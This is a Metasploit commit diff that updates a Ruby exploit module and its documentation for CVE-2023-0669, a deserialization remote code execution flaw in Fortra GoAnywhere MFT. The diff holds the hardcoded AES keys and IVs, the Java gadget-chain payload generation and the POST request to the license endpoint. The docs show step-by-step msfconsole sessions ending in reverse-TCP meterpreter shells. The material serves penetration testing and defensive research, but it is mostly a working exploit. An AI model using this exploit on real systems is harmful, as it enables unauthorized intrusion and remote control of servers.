Merge pull request #3 from smcintyre-r7/pr/collab/17607

Pr/collab/17607
Ron Bowes 2023-02-08 09:41:35 -08:00 committed by GitHub
commit 0c6ebed3ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 50 additions and 33 deletions


@ -10,7 +10,7 @@ register - you can just create a free account and download the application.
1. Install the application
1. Start the application on the server with `./goanywhere.sh start`
1. Start msfconsole
1. Do: `use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669`
1. Do: `use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669`
1. Set `LHOST` / `RHOST`
1. Do: `run`
1. You should get a shell.
@ -19,20 +19,19 @@ register - you can just create a free account and download the application.
### TARGET_URI
Set to the base path for the exploit - the default
(`/goanywhere/lic/accept?bundle=`) is usually fine.
Set to the base path for the exploit - the default (`/goanywhere/lic/accept`) is usually fine.
### VERSION
### Version
The version number of the encryption, which is appended to the encrypted text.
Changing the target will change this, but normally you don't have to tweak this.
Some hosts (like in FIPS-compliant mode) don't allow version 1, but preumably
Some hosts (like in FIPS-compliant mode) don't allow version 1, but presumably
there are older hosts that don't support version 2.
### ENCRYPTION_KEY / ENCRYPTION_IV / ENCRYPTION_ALGORITHM
### EncryptionKey / EncryptionIv / EncryptionAlgorithm
How to encrypt the object. Depending on the `VERSION`, there are different
How to encrypt the object. Depending on the `Version`, there are different
keys. This is updated when you change TARGET and probably doesn't need to be
changed.
@ -41,7 +40,7 @@ changed.
### Version 7.1.1 on Fedora Linux
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
@ -63,7 +62,7 @@ Server username: ron
### Using an earlier encryption version
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
@ -102,7 +101,7 @@ meterpreter >
# Version 7.1.1 over HTTP
```
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179


@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::JavaDeserialization
def initialize(info = {})
@ -29,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DisclosureDate' => '2023-02-01',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Platform' => ['unix', 'win'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
@ -37,10 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Version 2 Encryption',
{
'DefaultOptions' => {
'VERSION' => '$2',
'ENCRYPTION_KEY' => 'Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=',
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
'Version' => '$2',
'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',
'EncryptionIv' => '4145532f4342432f504b435335506164'
}
},
],
@ -48,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Version 1 Encryption',
{
'DefaultOptions' => {
'VERSION' => nil,
'ENCRYPTION_KEY' => 'Z4tYML+Lii4EdLl9bNGOhF+8SxH8oNavLbHrEUwp/Es=',
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
'Version' => '',
'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',
'EncryptionIv' => '4145532f4342432f504b435335506164'
}
}
],
@ -59,8 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8001,
'SSL' => true,
'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
@ -75,30 +71,52 @@ class MetasploitModule < Msf::Exploit::Remote
])
register_advanced_options([
OptString.new('VERSION', [false, 'A version value to append to the encrypted data', '$2']),
OptString.new('ENCRYPTION_KEY', [true, 'The encryption key to use (base64-encoded)']),
OptString.new('ENCRYPTION_IV', [true, 'The initialization vector (base64-encoded)']),
OptString.new('ENCRYPTION_ALGORITHM', [true, 'The encryption algorithm'])
OptString.new('Version', [false, 'A version value to append to the encrypted data']),
OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])
])
end
def build_cipher
unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) }
raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })
end
cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm'])
cipher.encrypt
option_errors = {}
iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join
unless cipher.iv_len == iv.length
option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."
end
key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join
unless cipher.key_len == key.length
option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."
end
raise Msf::OptionValidateError, option_errors unless option_errors.empty?
cipher.iv = iv
cipher.key = key
cipher
end
def exploit
vprint_status('Generating a serialized Java object with the payload')
obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)
vprint_status('Encrypting the payload')
cipher = OpenSSL::Cipher.new(datastore['ENCRYPTION_ALGORITHM'])
cipher.encrypt
cipher.iv = Base64.decode64(datastore['ENCRYPTION_IV'])
cipher.key = Base64.decode64(datastore['ENCRYPTION_KEY'])
cipher = build_cipher
obj = cipher.update(obj) + cipher.final
vprint_status('Sending request to the server')
res = send_request_cgi(
'method' => 'GET',
'method' => 'POST',
'uri' => datastore['TARGETURI'],
'vars_get' => {
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['VERSION'] || ''}"
'vars_post' => {
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"
}
)